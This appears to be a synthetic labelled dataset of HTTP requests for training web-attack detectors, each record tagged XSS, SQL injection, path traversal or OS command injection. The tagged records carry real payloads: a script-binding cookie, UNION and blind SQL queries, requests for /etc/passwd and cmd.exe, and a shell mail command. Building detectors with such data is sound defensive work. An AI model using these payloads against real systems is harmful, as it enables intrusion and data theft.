Date: Mon, 19 Mar 07 24:37:04 UTC
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: 100-continue
From: evel@exsYchnE.cz
If-Modified-Since: Sat, 27 May 06 19:44:21 GMT
If-Match: "i@qHLNVhN0Mb-BVf"
If-None-Match: *
If-Range: Wed, 24 Aug 05 16:20:52 UTC
Max-Forwards: 382
MIME-Version: 0.4
Pragma: j='sbtemria'
Proxy-Authorization: Digest cnonce="47it"
Authorization: NTLM ZXRIbmk2dElocDNuaXRobm9lMGhraHJkcmVtcm90bnlpaWxvaW5Od2x0bWhhY2h4
Range: 6-770122
Referer: http://www.gi8n.uk/oaiye2/pug3dxte.pl
Trailer: From
User-Agent: Mozilla/5.1 (X11; U; Solaris 6.4; ic-rr; rv:4.1.5) Gecko/40412110
UA-CPU: x86
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: yevfed/6.1 150.195.89.202
Transfer-Encoding: deflate
X-Forwarded-For: 217.52.49.74
----: ------------------------------------

null

End - Id: 36344
Start - Id: 46729
class: XSS
GET /h2qabrbre8nnecdgCn.jpeg?dentlautfaEel=9tfhihs%3Ereste&r1eeFanm=rGh&zjerpaPaHe3Tat=osc7n&Q6vFmeQ=ri%3Dryps%24tt&oesIot5w=ins&ssdps=%3Efaa+ev&mEOqhteyswmqdi=e59oeq+rs4dh HTTP/1.1
Host: www.esseHEsec.com:80
Connection: OwehRhlg
Accept: audio/basic;q=0.1, video/*, text/*
Accept-Charset: windows-1252;q=0.9, shift_jis;q=0.2, x-mac-arabic;q=0.4, x-mac-roman
Accept-Encoding: compress;q=0.6, compress;q=0.1, deflate, deflate, identity;q=0.7
Accept-Language: Hyl0-aaae, enyhjpa-utpfnfou;q=0.3, qn0omdod-uimme5ds;q=0.6
Cache-Control: no-cache
Client-ip: 132.16.81.131
Cookie: pwxe3eniodbttr=<div style=   "binding: url([http://www.sinaring.com/script/iinueere.php4]);" >;3he2hkfeiceat5B=r@p;KB04VIp=65212644;ratro=ftirtH;gfa5il=crm; ocglstIgn0etmetac1;dYEL3r1ZQ=+t5l
Cookie2: $Version="8"
Date: Sun, 08 Aug 04 24:11:59 CET
ETag: "GTgqffUoInO5cRE"
Expect: 100-continue
From: pNowsRmo@aghbh9m.gov
If-Modified-Since: Fri, 24 Jun 05 12:20:49 CET
If-Unmodified-Since: Wed, 16 Jul 08 16:05:06 CET
If-Match: "fDSG.pgJbg0upL9ZoZg"
If-None-Match: "Opry@I7.-3UISGO3vYox"
If-Range: *
Max-Forwards: 949
MIME-Version: 6.8
Pragma: no-cache
Authorization: lilxe heaelnte=ks0as
Range: 490-,7202-
Referer: /eeee/FcNcwrek/nhntddC1/tehh/sfU3on.asmx
TE: gzip;q=0.1,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/6.6 (compatible; lrBls; SunOS sun4u; exqUuaqerA; enypw; 7EsyNG6utt)
UA-OS: Win98
Via: 5.6 www.fth4oAwi.shtml, 0.9 www.5oce.htm
Transfer-Encoding: identity
Upgrade: poc/2.8, r1ikd/6.5, vsn/7.6, p8eWf/7.4
----: -------------------------------------------

null

End - Id: 46729
Start - Id: 41848
class: SqlInjection
GET /fWSlwxMDHeNkS85WJyK/aX9rwS4gDdCd/Uincluden1A0insert2hfXPE/oVeRb9I4Au44xmzyoR.jpeg?Et=884715&3sienc8=%27++++%2B+++++%28++++SELECT+TOP+1++TIohnetn+FROM+++hbuo1tr%29++++%2B++%27&fG.dT.d=42 HTTP/1.1
Host: 244.198.15.171
Connection: close
Accept: application/postscript, application/*;q=0.2, image/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.9, identity;q=0.1, gzip, gzip;q=0.1
Accept-Language: t-s;q=0.4, brn-ivht
Cache-Control: max-stale=86025
Client-ip: 78.57.136.131
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="08"
Date: Tue, 03 Jun 08 07:26:01 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: 100-continue
From: dupNd@t1Lces4e.com
If-Modified-Since: Fri, 10 Jun 05 17:32:58 UTC
If-Unmodified-Since: Fri, 18 Jul 08 14:54:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0553
MIME-Version: 1.6
Pragma: wftSdxh=saeirif
Proxy-Authorization: Basic ajU1aXBLYTM6b2R5ZW5EbjU=
Authorization: trzlai 6oadtc=6ostB
Range: 73381-69805,4-176585
Referer: http://www.ntudhnit.biz/zansaih/5aomen/fgnnL.doc
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: aeal (rTEkmD; eRhazyDgL; eLEfSyhyq-; b4CWznxlc)
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 219.12.246.47
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41848
Start - Id: 42796
class: SqlInjection
POST /sac/hytag/oB7wqxT/servicesmplocationtqllike2.exe? HTTP/1.1
Content-Length: 108
Content-Language: 9gpeoa
Content-Encoding: compress
Content-Location: /seYtd.avi
Content-MD5: ZHNlcHJqYXdlbG5sZGpoYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Mar 10 03:24:13 UTC
Last-Modified: Thu, 30 Dec 04 20:07:54 GMT
Host: www.tmes4F.net:80
Connection: close
Accept: */*;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: seen-mlxs, o6tmpf-z1ehse
Cookie: 5T9kEDaee=chairs' UN/**/ION   SEL/**/ECT ecyr  FROM  dba_users WHERE  26hlwf  like '%25
ETag: "lxr2B8VBB_pY6MD"
Expect: 4mareaa
From: uui6lX3@nthn.be
If-Modified-Since: Sat, 17 Apr 04 16:54:55 GMT
If-Unmodified-Since: Sat, 29 May 04 01:04:58 GMT
If-None-Match: *
Max-Forwards: 527
Proxy-Authorization: ir0e 2neA=Foqook6n
Referer: /totz/irUwr/2Efut/TL9skyem/06iltos.avi
Trailer: Referer
User-Agent: Mozilla/6.3 (compatible; MSIE 8.0; Linux i386; tr8Eyfa)
UA-CPU: MIPS
Via: ujr6i/3.7 www.eowe4.png, 0.2 www.yafdth.shtml:2486
Transfer-Encoding: deflate

scriptbTBUcEN.CSU=cnsa&a-vr=2n&57UfQetciL=tO@C-&bth6ixe0pnetao=T&6VDX6eZBinl@=f7tenoesouc&8eahhmstJ5yeh=83

End - Id: 42796
Start - Id: 42508
class: SqlInjection
GET /toxExiw@d/h5KDQ3Sq2TuSt02/wqBBUWplAEj/s37k4.O089C1_ETKm/pR@EY-/fM6g@PNxtbZ16N.tiff?tt7eeeacnnm=%27UNIONALLSELECTfieldFROMstonriangeWHERE%27%27%3D%27&brcynsPE6=hF%3D+&5stuoegch=17&X.VzOIwH=6450120&kserlheties8=ee%29q%3A&isceicgoWrh=allucotfT+t HTTP/1.0
Host: www.vg7iardi.ch
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, deflate, gzip;q=0.0, deflate;q=0.0
Accept-Language: hnre-1m7Itk, g1S-osge, dEezli-6m;q=0.3, c6-odD;q=0.6
Cache-Control: lrfte=h
Client-ip: 166.230.92.195
Cookie: drr=tsde;io=2fe o;wFC0httpse3= tgi6pipr;XexecU_=alnhtndttOECnias;KopassthruUpassthruk@c0=au;szelraoTrry4=667
Cookie2: $Version="85"
Date: Sat, 14 Jun 08 11:41:56 UTC
ETag: "Fhdp4@cKxDHrUkZvfQ"
Expect: l8stnrD=pfshg;7xeoaot=2nwljip2
From: be38Ged@6e9snto.ch
If-Modified-Since: Wed, 30 Mar 05 04:31:40 GMT
If-Unmodified-Since: Mon, 04 Apr 05 18:24:16 UTC
If-Match: "cQUDy1jS.NFiw2Od"
If-None-Match: *
If-Range: Tue, 02 Sep 08 14:23:54 GMT
Max-Forwards: 646
MIME-Version: 8.8
Pragma: ear='sv'
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest qop=auth
Range: 16802-
Referer: /edho/E4urnTe/rinaho/aeroSaye.nsf
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: alfpaTcenAsptrt
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: HTTP/3.4 91.221.152.198
Transfer-Encoding: identity
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42508
Start - Id: 36266
class: PathTransversal
PUT /o.c6IIcp@/nkOo/tuplie2mter/dserhen/ridC8AulJv/Ge3zr/o9B_wHZwXpDpbAZTzuAG/L26aacrki8e/w@jljZ/nta87/oMfjIPRO/thTg@o6r4.php4? HTTP/1.1
Content-Length: 76
Content-Language: d
Content-Encoding: identity
Content-Location: http://www.teoaoe.uk/pxdmtnen/habtah/qnnir.pdf
Content-MD5: cW81ZTBwMXJ1aWR0bHRpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Jan 05 10:33:16 GMT
Last-Modified: Sat, 10 May 08 07:50:45 UTC
Host: 0.244.115.92
Connection: close
Accept: text/*, image/*, audio/*
Accept-Charset: big5, x-mac-roman, x-mac-ce;q=0.7, x-mac-arabic, us-ascii
Accept-Encoding: 
Accept-Language: zBan-lqt;q=0.6, kCcoa6-nie;q=0.8, n6t-n4lmbtx;q=0.5, Ltv9oNs-eevotx, shax2-qvaomu
Cache-Control: only-if-cached
Client-ip: 112.174.108.236
Cookie: nets8bucx=e0sedgy;agI.OE=491;epcrmueBbsnp=86678;pur2onmTmornih=eqEy_u
Cookie2: $Version="960"
Date: Tue, 23 Feb 10 20:13:00 CET
ETag: W/"oOCb5nZctRT5ek672"
Expect: aPdn
From: h4lVt@earfemtsac.org
If-Modified-Since: Tue, 10 Aug 04 08:53:11 UTC
If-Unmodified-Since: Wed, 20 Jan 10 22:09:36 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Nov 08 04:54:59 GMT
Max-Forwards: 9983
MIME-Version: 7.1
Pragma: e5iYsOrs='y'
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://tOaiatu.cz/iDu6ra/t9eatat/estgsjum/ftms.tar.gz
TE: trailers,chunked
Trailer: Via
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 0.8; ea-ot; rv:5.4.8) Gecko/39390378
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: 9.3 www.ete3T.css, 2.7 34.87.115.152
Transfer-Encoding: lealek
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

0l=ti&ntxnN=/etc/passwd&jo=31c8winRwlai&zs1teaihyrttine=nnscxaiccngnsapE

End - Id: 36266
Start - Id: 42045
class: SqlInjection
GET /eI31prlsuXB./r9U1B6/n4tnHbrhhseanhg/qbwoidppc/huzihteee0t/rHa_4Y65_gET_/likevDD/ntiauenilscc/AEyyhlsfa/sevpNvliiYa/ooip6oSoynb7r1h.jpg?izafitseu=y0al&enl2es4trSAhem=t%5Corr+m%285s%5C&ljuiypt=nldeadEt5atmXerY2c&bts1tHc3ei=%27itservices&MvLVfMbgsoundtoQ77=%27+or+++++id+++in+%28+++++select+++++*+++++from+++++++user_db+++%29&u4txnibb7r=TIpnnj3eg HTTP/1.0
Host: 249.220.44.234:43
Connection: Ntciis
Accept: video/*, image/*;q=0.8, text/xml
Accept-Charset: iso-8859-9, x-mac-cyrillic;q=0.8, windows-1250;q=0.5
Accept-Encoding: *
Accept-Language: ug05o-5k5orif;q=0.1, ennc-Edn;q=0.7, daaera-r;q=0.1, rl0at-tniashai;q=0.3
Cache-Control: no-store
Client-ip: 238.155.89.77
Cookie: cmdKIhomethdhjyeQ=5Ln
Cookie2: $Version="2"
Date: Tue, 09 Aug 05 23:54:44 UTC
ETag: W/"uOk-Ks6myYKrSBH2D"
Expect: deaHes
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Wed, 17 Sep 08 21:58:40 GMT
If-Unmodified-Since: Mon, 24 Nov 08 08:07:36 CET
If-Match: "3BXxFiC8FP_@k2Gn"
If-None-Match: *
If-Range: "GTjGF-FEDM86fcSk73vM"
Max-Forwards: 83
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dW9lNm90aGFheHNpdG9hYXd3ZXRFbm9mdDVpdXVkeWllYWVkbXg0aHpoQWw=
Range: -7
Referer: http://Ebeeaqv.be/h5or/wrkaoeqs/u14pssl.cfm
TE: deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/9.5 (Windows; U; Win 9x 3.2; hi-xo; rv:4.8.8) Gecko/67956107
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 422x9399
Via: 8.0 www.ipeLehc.htm, 0.7 25.139.239.228, FTP/5.2 www.o7Iroc.tiff
Transfer-Encoding: gzip
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 78968713276550254
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42045
Start - Id: 41042
class: SqlInjection
GET /yzpYwea6ers2/andttdcmdB/TST6@/teRarifsbkegsoth.nsf?alswbpanns7=70308&z-Pyv=1Bndoaaqoesomw&0nullc_HFxtermS5ZQN=9&ninzmpfClSaxhse=02226&oio2oNeaUl=%27%3B++EXEC+++master.dbo.sp_makewebtask++++%27c%3A%5Cinetpub%5Cwwwroot%5Ca9asj.shtml%27%2C++++%27SELECT++++enEeu+++FROM+kDsw6+++++WHERE+++++xtype%3D%27%27U%27%27%27 HTTP/1.0
Host: www.nhfynor.it:3533
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, euc-cn;q=0.0, iso-2022-jp, iso-8859-4
Accept-Encoding: 
Accept-Language: 4ani-meubety;q=0.2, ip8-gdtto, 3se-rwh, aius-ekthtso7;q=0.9, xtwe2lrc-zlri8
Cache-Control: no-transform
Client-ip: 228.241.241.37
Cookie: cron=/a wlIactrobai;tqsnnr=sKXKISCYdWvv;agnrg=s0;kwyeuqfoge=reMT_le;ihHpe=e
Cookie2: $Version="1"
Date: Tue, 17 Jul 07 01:17:23 CET
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: i4axWsi@dEthgse.cz
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Wed, 21 May 08 16:16:52 CET
If-Match: *
If-None-Match: "RpkovYZmfpWLjLn"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 44
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic OGZidGM1cXo6bFRzcUE0dA==
Range: 7-04,570-
Referer: http://www.dgmy.fr/tsutH/troCis/egoh0llr/sttmte3.css
TE: deflate;q=0.8
User-Agent: a0pMGip http://www.5hnlm.ch
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 381x817
Via: laoeoe/4.4 84.117.104.4
Transfer-Encoding: deflate
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 050 www.r6ioleOa.htm "witutEd" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41042
Start - Id: 35253
class: SqlInjection
GET /aEJ/i4D7QnlVoNOeVXKdrYK3/tLxIg8F/we0Reicgt/FKv1B/ecnoi/5@CYs/nKtanii9rijPCifr/iiAieE/etdhera/teoetedWenbune/aX.6q0rFacPe7p8bk.cgi?h2rj=AND+ascii%28lower%28substring%28%28SELECT++TOP+++++1+++IoiAchtn++++FROM+++sysobject+++WHERE++xtype+++%3D++%27U%27++++%29%2C1%2C1%29%29%29+++%3E++111&nheur924J=xp_include&yinmoa29=41745701&%uK246-lk-=vbscriptlr&LnZesioxoe=oks4N&jfCECb@c=rzXJrL&nhu=6a&hoOlsr0twsQrr=mea&mgh4liequ=uHNJrjbGC&1pu2r=2&hpjmi3raerolemr=+Kd&6nEjyt6ent=7376 HTTP/1.0
Host: www.dqhh3fdps.de
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.4, ks_c_5601-1987, windows-1257;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=33
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="4"
Date: Fri, 07 Dec 07 20:40:20 CET
ETag: W/"h5c8dbh08wjBAvV"
Expect: 8nlRin
From: ieogO97c@1xtO.uk
If-Modified-Since: Thu, 02 Apr 09 04:44:39 GMT
If-Unmodified-Since: Thu, 25 Sep 08 11:11:24 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6871
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: NTLM c3MyNXYyaG9pVGZvclJsb2tkRWllOFJFZXRpczh0b2lmb2J5aWox
Range: 275-
Referer: /0tea0/iioein/0heh.tar.gz
TE: trailers,trailers,deflate;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 9.6; ts-Fp; rv:2.0.8) Gecko/20425224
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7374x0863
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: ltnenc
Upgrade: vet/2.3
Warning: 690 www.lipntex.shtml "aeisgIo7eETipoewea" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35253
Start - Id: 35121
class: SqlInjection
PUT /8@P1TcBVKWTgE/kTAtudsoiE/hhpe4T6rqhTooEonet/ceq1eiehfsrt/11YNXdFur5/inod/ite/3eeshrcnc/jhehova2I/rltiesoe/binHVsn8pcBKVxVy/tfromy5UX28etc5FiOY.jpeg? HTTP/1.1
Content-Length: 312
Content-Language: s4hdu4z,asMncmd,mSzts
Content-Encoding: gzip
Content-Location: /do8hr5/sseyont/186sreN/ecTeso/tb7tkmt.cgi
Content-MD5: aDlsdWVuMzVocDZjbWVUVA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 22 Oct 06 21:35:33 CET
Host: www.qs7z5lGE.st
Connection: close
Accept: image/*;q=0.1, video/*;q=0.5, application/*
Accept-Charset: euc-kr;q=0.7, hz-gb-2312;q=0.8
Accept-Encoding: gzip;q=0.7, deflate;q=0.1, identity
Accept-Language: aooehz-i7dsuw;q=0.6, woer-rLhhT, yrn-gal;q=0.9, Bn-6yb1Na
Cache-Control: max-stale
Client-ip: 104.9.2.127
Cookie2: $Version="4"
Date: Mon, 16 Nov 09 16:45:00 CET
Expect: otivt=3rMnsoaS
If-Modified-Since: Sat, 14 May 05 08:23:53 UTC
If-Unmodified-Since: Fri, 23 May 08 15:29:28 UTC
If-None-Match: "IqZKmOoHrd@xw-iN6"
If-Range: Wed, 09 Jun 04 04:31:57 GMT
Max-Forwards: 631
Pragma: no-cache
Range: 255878-
Referer: /eewiqA/iccer/ocEntyta/alTii.zip
TE: trailers,trailers,deflate
User-Agent: nutn (lpdWW8s0j; eo-Lj14S6)
UA-OS: Win98
Via: HTTP/1.0 www.golaGf.png
Transfer-Encoding: rdtn
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wHsunRzrntw=e&r2=i&r1rattli1=4bel;da7~|Te<&Jnoyaeikidh8hbg='  )     UNION  ALL    SELECT    ep5h0bnt    ,  tsv ,   Iaae   FROM   t6  WHERE riAnrRustr  NOT IN  (   'yf6amcse'  )    AND uoa    NOT   IN (   'eHiE')   AND   ''=  '&6onrpTtrbsaca1=9TRefn3t&CYVNLl4PdLgg=29044071

End - Id: 35121
Start - Id: 45744
class: PathTransversal
GET /ea/oe3IeIroibmooozLipar/isFmMc/Ey/oesdwWgae8t.asp?eNfOesred=le%28o+vze%40o&1nlstl7ptab=a%26services&radgeiuw=+dt7%2BW7niIeadminj%40%26ande&diupn3=31564991&ehAUsEni0feAo0=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 202.244.179.83
Connection: s4Ftsb
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 90.173.15.184
Cookie: 8ms=62083
Cookie2: $Version="34"
Date: Mon, 01 Nov 04 23:18:53 GMT
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Fri, 14 Apr 06 23:37:42 GMT
If-Unmodified-Since: Fri, 24 Feb 06 17:54:29 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: *
If-Range: Mon, 26 Apr 10 04:08:55 GMT
Max-Forwards: 9
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: wptoa ypehsb8=2pbhrh0a
Authorization: NTLM dHJudWdOZGlIbGNwaW5ic0RlaGRobmtzbnhkbG9pcmMxb21laWlUZWxodGt0
Range: -500252,934-3694
Referer: http://one4cai.de/sitmj5Ed/cjuth/ocedh/nalip.aspx
TE: gzip;q=0.5,deflate;q=0.0
Trailer: If-None-Match
User-Agent: 97nvIiOb/1.3.9.0
UA-CPU: StrongARM
UA-Disp: 857,9734,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 979x8035
Via: 6.0 162.59.76.194, 3.0 242.2.206.24, 6.1 www.35tst.shtml
Transfer-Encoding: iRed; ea0um=pycehsj
Upgrade: e5r/8.9, sadhn/5.0, mdrxl/0.0, i4auie/7.0
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45744
Start - Id: 42215
class: SqlInjection
GET /rd/qhJPOK0mLhcQ8t/nO/nw4@zfa0nc7/yZypformAEH_sV/lnnqi7vAiRsgm12w/D3xpasswd3jV1vQX0.js?K1T2_D4X=%27++OR+++%27esi%27+++++%3E++%27S&i2O3hStlsin=n+nt%40ln%7E&grsr=gnf4trCdehy6f&aeYphtnevcBdet=eG6MtbQN&lontisamghH=ouiL1VYU HTTP/1.0
Host: 67.188.16.125
Connection: keep-alive
Accept: audio/*;q=0.4, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: erlIeat-snxt
Cache-Control: sik='iw'
Client-ip: 18.67.226.114
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="62"
Date: Mon, 02 Jan 06 07:13:20 GMT
ETag: W/"Hj32b9gWZ7k@hB4iM"
Expect: cttahr1o
From: 6bttom@2kOpyg.org
If-Modified-Since: Sun, 22 Aug 04 23:10:13 UTC
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Feb 05 21:31:27 UTC
Max-Forwards: 5867
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: ssh1 s2e1asI=bttabi
Range: -66
Referer: /6t0Do/sctntar/9e8r4r.js
TE: trailers
Trailer: Max-Forwards
User-Agent: rusesree (eNdo2.N; te_0Mo-j; lfXa02; uNf0Hl; eRuuJHg)
UA-CPU: x86
UA-Disp: 327,4301,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 6.2 125.171.191.194
Transfer-Encoding: compress
Upgrade: he8e/9.1, uArqem/3.7, oettlh/8.9
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42215
Start - Id: 44205
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 30.21.81.234:63198
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 58.77.18.243
Cookie: mwoZ=ni+&rajieyrconnectbody;SorJ=iAinPs>psscript;xeere=o;21ePq6ye=q)9a
Cookie2: $Version="370"
Date: Mon, 22 Dec 08 12:50:16 UTC
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sun, 26 Nov 06 05:28:15 CET
If-Unmodified-Since: Wed, 16 Mar 05 17:13:38 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Mar 10 01:58:51 CET
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="o9rzL"
Authorization: 9w0nEe Hqmzed=bebg
Range: 808-
Referer: /Dsuee/ocahuo.ace
TE: trailers,deflate;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 4.5; nn-zd; rv:9.4.9) Gecko/87684029
UA-CPU: PowerPC
UA-Disp: 0876,3818,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: HTTP/8.7 www.1Tto1o.css:96155
Transfer-Encoding: identity
Upgrade: FsT/8.7
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44205
Start - Id: 43041
class: OsCommanding
PUT /sOdrru.png? HTTP/1.0
Content-Length: 192
Content-Language: t2naswth,ane7hN,ciae
Content-Encoding: gzip
Content-Location: http://9how.uk/n7rhtni3/R37zeie.cfm
Content-MD5: Y21kYXJhaTRuY2VlbTJuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: www.tyddcw.be:0
Connection: omEtvr
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.9
Accept-Language: wog-1io3m, pd5pir-y;q=0.2, agjrv-atuti;q=0.2, ae8ama-emniefad;q=0.2, t9la-cmdrajZe
Cache-Control: no-store
Client-ip: 147.157.247.88
Cookie: gga=nl>a;sv3AtE4=7399;tgatgA=796;k0zHpasswdq=snIwV@Xm
Cookie2: $Version="447"
Date: Tue, 01 May 07 19:22:49 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: a0ee@enelreh.it
If-Modified-Since: Tue, 22 May 07 22:09:41 GMT
If-Unmodified-Since: Thu, 24 Apr 08 06:09:09 UTC
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: oioriy='Aea'
Proxy-Authorization: NTLM MmdvZGhlcmRoZXdpZm1uY2lldG9MR3Nlc3d6MHNobmZ1dGVGc1Nyb3BpMVQ3cHVj
Authorization: Basic ZHJycXc6d3JhaHI=
Range: -98633,070828-,-9277
Referer: /wnoo5.php3
TE: chunked;q=0.8
Trailer: From
User-Agent: Thrctkik
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/4.4 68.103.204.17, oER/4.5 227.47.97.62
Transfer-Encoding: gzip
Upgrade: sin/4.4, nanj/1.1, sfgit/8.7, sxHu/2.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~

viomei=esdsh&oeiateshna=eeanwrewiRgs&LYnHk=780&f5yj=600275&47o=9rqkehMa&y0aC=h&rtJj=stahe@ole0&I1S7gmX=rOmiyrIT&ynJtw=mail  4o@nbertsxE.uX5vwe.gov <<    /tmp/wu.c;&wZXmIH=mbsneso

End - Id: 43041
Start - Id: 38333
class: LdapInjection
